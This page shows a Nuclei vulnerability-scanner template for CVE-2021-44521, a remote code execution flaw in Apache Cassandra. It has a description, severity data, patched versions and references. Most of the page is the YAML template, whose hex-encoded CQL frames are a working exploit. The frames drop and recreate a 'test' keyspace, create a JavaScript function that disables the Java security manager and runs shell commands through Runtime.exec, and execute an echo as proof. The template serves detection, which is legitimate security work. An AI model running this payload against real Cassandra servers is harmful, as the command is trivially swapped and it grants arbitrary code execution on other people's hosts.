Skip to content
Nuclei Templates

Apache Cassandra Load UDF RCE

ID: CVE-2021-44521

Severity: critical

Author: Y4er

Tags: cve,cve2021,network,rce,apache,cassandra,tcp

Description

Section titled “Description”

When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.

YAML Source

Section titled “YAML Source”
id: CVE-2021-44521


info:
  name: Apache Cassandra Load UDF RCE
  author: Y4er
  severity: critical
  description: 'When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.'
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code with the privileges of the Cassandra process, potentially leading to a complete compromise of the affected system.
  remediation: 3.0.x users should upgrade to 3.0.26, 3.11.x users should upgrade to 3.11.12, 4.0.x users should upgrade to 4.0.2
  reference:
    - https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44521
    - https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
    - https://lists.apache.org/thread/y4nb9s4co34j8hdfmrshyl09lokm7356
    - http://www.openwall.com/lists/oss-security/2022/02/11/4
    - https://thesecmaster.com/how-to-fix-apache-cassandra-rce-vulnerability-cve-2021-44521/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2021-44521
    cwe-id: CWE-732,CWE-94
    epss-score: 0.05417
    epss-percentile: 0.93135
    cpe: cpe:2.3:a:apache:cassandra:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: cassandra
    shodan-query: cpe:"cpe:2.3:a:apache:cassandra"
  tags: cve,cve2021,network,rce,apache,cassandra,tcp
tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:9042"
    inputs:
      - data: "050000000500000000"
        type: hex
        read: 1024


      - data: "0500000101000000530003000b4452495645525f4e414d450016446174615374617820507974686f6e20447269766572000e4452495645525f56455253494f4e0006332e32352e30000b43514c5f56455253494f4e0005332e342e35"
        type: hex
        read: 1024


      - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
        type: hex
        read: 1024


      - data: "7f0002a6a69f0500000407000000760000005e435245415445204b4559535041434520746573742057495448207265706c69636174696f6e203d207b27636c617373273a202753696d706c655374726174656779272c20277265706c69636174696f6e5f666163746f7227203a20317d3b0001000000340000006400080005d82cc8ca390f0ddce06b"
        type: hex
        read: 1024


      - data: "7d000296664f0500000807000000740000005c435245415445205441424c4520746573742e7263652028636d642076617263686172205052494d415259204b455929205749544820636f6d6d656e743d27496d706f7274616e742062696f6c6f676963616c207265636f726473273b0001000000340000006400080005d82cc8cb2fc161951510"
        type: hex
        read: 1024


      - data: "1c030291ff34050000100700000313000002fb637265617465206f72207265706c6163652046554e4354494f4e20746573742e657865632820636d64207465787420290d0a2020202052455455524e53204e554c4c204f4e204e554c4c20494e5055540d0a2020202052455455524e5320746578740d0a202020204c414e4755414745206a6176617363726970740d0a2020202041532024240d0a202020207661722053797374656d203d204a6176612e7479706528226a6176612e6c616e672e53797374656d22293b53797374656d2e73657453656375726974794d616e61676572286e756c6c293b0d0a202020207661722065203d746869732e656e67696e652e666163746f72792e736372697074456e67696e652e6576616c2827766172206f736e616d65203d206a6176612e6c616e672e53797374656d2e67657450726f706572747928226f732e6e616d6522293b6f736e616d65203d206f736e616d652e746f4c6f7765724361736528293b7661722073706c6974203d206f736e616d652e73746172747357697468282277696e2229203f20222f6322203a20222d63223b76617220636d6450617468203d206f736e616d652e73746172747357697468282277696e2229203f2022636d6422203a202262617368223b76617220636f6d6d616e64203d2022272b636d642b27223b7661722073203d205b636d64506174682c2073706c69742c20636f6d6d616e645d3b70203d206a6176612e6c616e672e52756e74696d652e67657452756e74696d6528292e657865632873293b766172206272203d206e6577206a6176612e696f2e4275666665726564526561646572286e6577206a6176612e696f2e496e70757453747265616d52656164657228702e676574496e70757453747265616d282929293b766172207265733d22223b7768696c652028286c203d2062722e726561644c696e6528292920213d206e756c6c29207b202020207265732b3d6c3b7265732b3d6a6176612e6c616e672e53797374656d2e6c696e65536570617261746f7228293b7d27293b0d0a20202020653b0d0a2020202024243b0001000000340000006400080005d82cc8cc7ece89646c85"
        type: hex
        read: 1024


      - data: "51000278033505000014070000004800000030696e7365727420696e746f20746573742e72636528636d64292076616c75657328276563686f2031323331323327293b0001000000340000006400080005d82cc8cd5b810ef0b16e"
        type: hex
        read: 1024


      - data: "450002bff1d805000015070000003c0000002473656c65637420746573742e6578656328636d64292066726f6d20746573742e7263653b0001000000340000006400080005d82cc8cd99d444271281"
        type: hex
        read: 1024


      - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
        type: hex
        read: 1024
    matchers:
      - type: word
        part: raw
        words:
          - "123123"
# digest: 4a0a00473045022100fc792695034c7290c70772228f865e7c2c2b823808fcffebfd0a2030f7fc09600220137f652933f8325c27be875a3ed379eb48ac23f145047830fa6eda03d8d21356:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "network/cves/2021/CVE-2021-44521.yaml"

View on Github